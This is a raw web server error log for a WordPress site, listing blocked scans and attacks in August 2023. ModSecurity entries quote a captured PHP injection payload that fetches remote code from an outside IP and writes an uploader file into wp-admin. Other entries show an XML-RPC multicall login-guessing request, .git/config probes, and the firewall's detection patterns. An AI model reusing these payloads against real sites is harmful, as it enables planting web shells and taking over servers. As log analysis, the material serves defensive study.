"OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-login.php"] [unique_id "ZOASD0Wc94tsnIsHAQ-uRwAAAMI"] [Fri Aug 18 19:51:28.424185 2023] [:error] [pid 18872:tid 140103465973504] [client 186.250.187.202:37526] [client 186.250.187.202] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\A|[^\\\\d])0x[a-f\\\\d]{3,}[a-f\\\\d]*)+" at ARGS:<?xml version. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "55"] [id "981260"] [rev "2"] [msg "SQL Hex Encoding Identified"] [data "Matched Data: >0x1999 found within ARGS:<?xml version: \\x221.0\\x22?><methodCall><methodName>system.multicall</methodName><params><param><value><array><data><value><struct><member><name>methodName</name><value><string>wp.getUsersBlogs</string></value></member><member><name>params</name><value><array><data><value><array><data><value><string>0x1999</string></value><value><string></string></value></data></array></value></data></array></value></member></struct></value></data></array></value></param></params><..."] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag " [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "ZOASEPG_rKmCSnA6LxD-_AAAAAQ"] [Fri Aug 18 21:43:50.470083 2023] [:error] [pid 18873:tid 140103343126272] [client 54.172.165.52:45146] [client 54.172.165.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at ARGS:vz. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: fwrite found within ARGS:vz: $x=fwrite(fopen($_SERVER['DOCUMENT_ROOT'].'/wp-admin/css/colors/blue/uploader.php','w+'),file_get_contents('http://51.79.124.111/vz.txt'));echo \\x22aDriv4\\x22.$x;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-admin/css/colors/blue/blue.php"] [unique_id "ZOAsZrCcrCl0jrDdhfxf2QAAAEo"], referer: www.google.com [Fri Aug 18 23:17:34.962084 2023] [autoindex:error] [pid 18874:tid 140103275984640] [client 40.83.60.92:50960] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Sat Aug 19 10:14:46.689455 2023] [autoindex:error] [pid 25647:tid 139744486786816] [client 5.75.182.194:53356] AH01276: Cannot serve directory /home/investig/public_html/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: https://investigacionperu.com/css/index.php?673435=8 [Sat Aug 19 11:11:09.503137 2023] [authz_core:error] [pid 25798:tid 139744654640896] [client 139.144.150.8:55396] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2023/08/19 11:11:13 [error] 25432#25432: *1131735 access forbidden by rule, client: 139.144.150.8, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Sat Aug 19 11:33:34.767145 2023] [authz_core:error] [pid 25488:tid 139744595891968] [client 139.59.182.142:56296] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2023/08/19 11:33:38 [error] 25431#25431: *1132434 access forbidden by rule, client: 139.59.182.142, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Sat Aug 19 11:50:31.837769 2023] [authz_core:error] [pid 25647:tid 139744654640896] [client 139.144.150.205:57022] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2023/08/19 11:50:35 [error] 25431#25431: *1132930 access forbidden by rule, client: 139.144.150.205, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Sat Aug 19 12:00:16.420532 2023] [authz_core:error] [pid 25798:tid 139744528750336] [client 74.207.237.46:57522] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2023/08/19 12:00:19 [error] 25432#25432: *1133374 access forbidden by rule, client: 74.207.237.46, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Sat Aug 19 14:47:20.363661 2023] [autoindex:error] [pid 25798:tid 139744503572224] [client 40.69.155.148:36168] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Sat Aug 19 23:34:04.635844 2023] [:error] [pid 25647:tid 139744579106560] [client 34.16.46.135:57422] [client 34.16.46.135] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at ARGS:vz. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: fwrite found within ARGS:vz: $x=fwrite(fopen($_SERVER['DOCUMENT_ROOT'].'/wp-admin/css/colors/blue/uploader.php','w+'),file_get_contents('http://51.79.124.111/vz.txt'));echo \\x22aDriv4\\x22.$x;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-admin/css/colors/blue/blue.php"] [unique_id "ZOGXvPn8HzChoaI73d-3RAAAAQw"], referer: www.google.com [Sun Aug 20 00:04:22.757074 2023] [autoindex:error] [pid 25798:tid 139744646248192] [client 40.122.51.179:58648] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Sun Aug 20 08:25:00.170179 2023] [autoindex:error] [pid 31449:tid 140601601230592] [client 74.208.61.87:49356] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Sun Aug 20 11:58:01.779986 2023] [:error] [pid 31358:tid 140601668372224] [client 35.224.6.244:59928] [client 35.224.6.244] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at ARGS:vz. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: fwrite found within ARGS:vz: $x=fwrite(fopen($_SERVER['DOCUMENT_ROOT'].'/wp-admin/css/colors/blue/uploader.php','w+'),file_get_contents('http://51.79.124.111/vz.txt'));echo \\x22aDriv4\\x22.$x;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-admin/css/colors/blue/blue.php"] [unique_id "ZOJGGXeNDGU9O5TBvXFvfQAAAIg"], referer: www.google.com [Sun Aug 20 13:40:27.738212 2023] [autoindex:error] [pid 31357:tid 140601805735680] [client 170.106.176.116:37834] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com 2023/08/20 16:24:23 [error] 31317#31317: *1189828 access forbidden by rule, client: 3.79.1.72, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2023/08/20 16:24:25 [error] 31317#31317: *1189829 access forbidden by rule, client: 3.79.1.72, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2023/08/20 16:24:25 [error] 31317#31317: *1189830 access forbidden by rule, client: 3.79.1.72, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2023/08/20 16:24:26 [error] 31316#31316: *1189831 access forbidden by rule, client: 3.79.1.72, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2023/08/20 16:24:41 [error] 31317#31317: *1189832 access forbidden by rule, client: 3.79.1.72, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2023/08/20 16:24:56 [error] 31316#31316: *1189839 access forbidden by rule, client: 3.79.1.72, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2023/08/20 16:24:56 [error] 31317#31317: *1189848 access forbidden by rule, client: 3.79.1.72, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2023/08/20 16:24:57 [error] 31317#31317: *1189849 access forbidden by rule, client: 3.79.1.72, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2023/08/20 17:16:35 [error] 31317#31317: *1191080 access forbidden by rule, client: 3.79.16.102, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2023/08/20 17:16:35 [error] 31316#31316: *1191081 access forbidden by rule, client: 3.79.16.102, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2023/08/20 17:16:35 [error] 31316#31316: *1191082 access forbidden by rule, client: 3.79.16.102, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2023/08/20 17:16:36 [error] 31316#31316: *1191083 access forbidden by rule, client: 3.79.16.102, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2023/08/20 17:16:36 [error] 31317#31317: *1191084 access forbidden by rule, client: 3.79.16.102, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2023/08/20 17:16:36 [error] 31317#31317: *1191085 access forbidden by rule, client: 3.79.16.102, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2023/08/20 17:16:37 [error] 31316#31316: *1191086 access forbidden by rule, client: 3.79.16.102, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2023/08/20 17:16:37 [error] 31316#31316: *1191087 access forbidden by rule, client: 3.79.16.102, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Mon Aug 21 01:54:43.118585 2023] [autoindex:error] [pid 4328:tid 140601805735680] [client 13.67.235.13:42526] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Mon Aug 21 05:35:14.499207 2023] [:error] [pid 8676:tid 140274688841472] [client 179.43.191.18:55380] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Mon Aug 21 06:28:35.637204 2023] [authz_core:error] [pid 8038:tid 140274546165504] [client 137.184.162.65:58838] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2023/08/21 06:28:38 [error] 7865#7865: *1223430 access forbidden by rule, client: 137.184.162.65, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Mon Aug 21 06:39:27.455336 2023] [authz_core:error] [pid 8676:tid 140274819315456] [client 159.89.83.196:59420] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2023/08/21 06:39:30 [error] 7865#7865: *1223863 access forbidden by rule, client: 159.89.83.196, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Mon Aug 21 06:43:58.473336 2023] [authz_core:error] [pid 8676:tid 140274688841472] [client 159.203.182.222:59732] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2023/08/21 06:44:00 [error] 7865#7865: *1224133 access forbidden by rule, client: 159.203.182.222, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Mon Aug 21 07:01:50.316057 2023] [authz_core:error] [pid 8037:tid 140274638485248] [client 167.172.232.142:60902] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2023/08/21 07:01:53 [error] 7865#7865: *1225100 access forbidden by rule, client: 167.172.232.142, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Mon Aug 21 16:02:10.181229 2023] [autoindex:error] [pid 8676:tid 140274672056064] [client 130.211.216.56:38560] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Mon Aug 21 19:53:43.200726 2023] [autoindex:error] [pid 8676:tid 140274638485248] [client 179.43.191.18:49834] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/tinymce/skins/lightgray/img/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/js/tinymce/skins/lightgray/img/index.php?p= [Mon Aug 21 22:03:14.247426 2023] [:error] [pid 20511:tid 140274562950912] [client 34.133.199.200:55848] [client 34.133.199.200] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at ARGS:vz. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: fwrite found within ARGS:vz: $x=fwrite(fopen($_SERVER['DOCUMENT_ROOT'].'/wp-admin/css/colors/blue/uploader.php','w+'),file_get_contents('http://51.79.124.111/vz.txt'));echo \\x22aDriv4\\x22.$x;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-admin/css/colors/blue/blue.php"] [unique_id "ZOQlcqVWqqg4KDJhHX3LTgAAARY"], referer: www.google.com [Tue Aug 22 08:48:44.626168 2023] [:error] [pid 14391:tid 140615114950400] [client 179.43.191.18:41704] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Tue Aug 22 08:48:45.017839 2023] [:error] [pid 14391:tid 140614972712704] [client 179.43.191.18:41708] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Tue Aug 22 11:02:10.203526 2023] [autoindex:error] [pid 14392:tid 140614846822144] [client 199.192.25.235:52156] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/2020/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-content/uploads/2020/index.php [Tue Aug 22 20:22:10.245282 2023] [authz_core:error] [pid 14391:tid 140614947534592] [client 139.144.150.8:53404] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2023/08/22 20:22:15 [error] 14319#14319: *1328523 access forbidden by rule, client: 139.144.150.8, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Tue Aug 22 20:36:20.294848 2023] [authz_core:error] [pid 14391:tid 140614981105408] [client 165.232.76.155:53946] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2023/08/22 20:36:23 [error] 14318#14318: *1328942 access forbidden by rule, client: 165.232.76.155, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Tue Aug 22 20:44:12.680825 2023] [authz_core:error] [pid 14486:tid 140614922356480] [client 144.126.198.24:54400] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2023/08/22 20:44:17 [error] 14319#14319: *1329352 access forbidden by rule, client: 144.126.198.24, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Tue Aug 22 21:04:56.147916 2023] [:error] [pid 14391:tid 140614972712704] [client 47.75.44.110:55882] PHP Fatal error: Uncaught Error: Call to undefined function get_header() in /home/investig/public_html/wp-content/themes/twentytwentyone/index.php:17, referer: http://simplesite.com [Tue Aug 22 21:04:56.148004 2023] [:error] [pid 14391:tid 140614972712704] [client 47.75.44.110:55882] Stack trace:, referer: http://simplesite.com [Tue Aug 22 21:04:56.148018 2023] [:error] [pid 14391:tid 140614972712704] [client 47.75.44.110:55882] #0 {main}, referer: http://simplesite.com [Tue Aug 22 21:04:56.148101 2023] [:error] [pid 14391:tid 140614972712704] [client 47.75.44.110:55882] thrown in /home/investig/public_html/wp-content/themes/twentytwentyone/index.php on line 17, referer: http://simplesite.com [Tue Aug 22 21:04:58.503773 2023] [:error] [pid 14486:tid 140614880392960] [client 47.75.44.110:55888] PHP Fatal error: Uncaught Error: Call to undefined function get_header() in /home/investig/public_html/wp-content/themes/twentytwentyone/index.php:17, referer: http://simplesite.com [Tue Aug 22 21:04:58.503852 2023] [:error] [pid 14486:tid 140614880392960] [client 47.75.44.110:55888] Stack trace:, referer: http://simplesite.com [Tue Aug 22 21:04:58.503869 2023] [:error] [pid 14486:tid 140614880392960] [client 47.75.44.110:55888] #0 {main}, referer: http://simplesite.com [Tue Aug 22 21:04:58.503971 2023] [:error] [pid 14486:tid 140614880392960] [client 47.75.44.110:55888] thrown in /home/investig/public_html/wp-content/themes/twentytwentyone/index.php on line 17, referer: http://simplesite.com [Tue Aug 22 23:50:19.951378 2023] [autoindex:error] [pid 29530:tid 140614972712704] [client 157.7.106.16:35934] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/spacer/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/blocks/spacer/index.php [Tue Aug 22 23:50:21.481744 2023] [autoindex:error] [pid 14391:tid 140614855214848] [client 157.7.106.16:35940] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/spacer/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/blocks/spacer/index.php [Wed Aug 23 00:19:41.245992 2023] [autoindex:error] [pid 14486:tid 140614863607552] [client 108.167.132.200:37014] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/PHPMailer/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/PHPMailer/index.php [Wed Aug 23 00:46:44.341465 2023] [authz_core:error] [pid 14391:tid 140614838429440] [client 144.126.202.105:38244] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2023/08/23 00:46:47 [error] 14319#14319: *1339235 access forbidden by rule, client: 144.126.202.105, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Wed Aug 23 01:29:57.689420 2023] [:error] [pid 29530:tid 140614972712704] [client 40.83.62.227:40240] [client 40.83.62.227] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at ARGS:vz. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: fwrite found within ARGS:vz: $x=fwrite(fopen($_SERVER['DOCUMENT_ROOT'].'/wp-admin/css/colors/blue/uploader.php','w+'),file_get_contents('http://51.79.124.111/vz.txt'));echo \\x22aDriv4\\x22.$x;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-admin/css/colors/blue/blue.php"] [unique_id "ZOWnZYrhAI-Bb1wK74NW1QAAAQg"], referer: www.google.com [Wed Aug 23 01:39:16.783750 2023] [autoindex:error] [pid 29530:tid 140614897178368] [client 62.141.38.215:40500] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: www.google.com [Wed Aug 23 02:42:20.848779 2023] [autoindex:error] [pid 14486:tid 140614939141888] [client 13.67.235.13:43590] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Wed Aug 23 09:43:23.009864 2023] [:error] [pid 25841:tid 140233802757888] [client 139.59.83.162:59174] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/xmrlpc.php [Wed Aug 23 09:43:24.590787 2023] [autoindex:error] [pid 25841:tid 140233643296512] [client 139.59.83.162:59178] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/tinymce/plugins/compat3x/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Aug 23 09:43:27.941391 2023] [autoindex:error] [pid 26057:tid 140233827936000] [client 139.59.83.162:59184] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/coffee/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Aug 23 09:43:51.415869 2023] [autoindex:error] [pid 25839:tid 140233836328704] [client 139.59.83.162:59228] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/tinymce/skins/lightgray/img/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Aug 23 12:18:23.697265 2023] [:error] [pid 25841:tid 140233651689216] [client 34.31.44.244:38420] [client 34.31.44.244] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at ARGS:vz. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: fwrite found within ARGS:vz: $x=fwrite(fopen($_SERVER['DOCUMENT_ROOT'].'/wp-admin/css/colors/blue/uploader.php','w+'),file_get_contents('http://51.79.124.111/vz.txt'));echo \\x22aDriv4\\x22.$x;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag 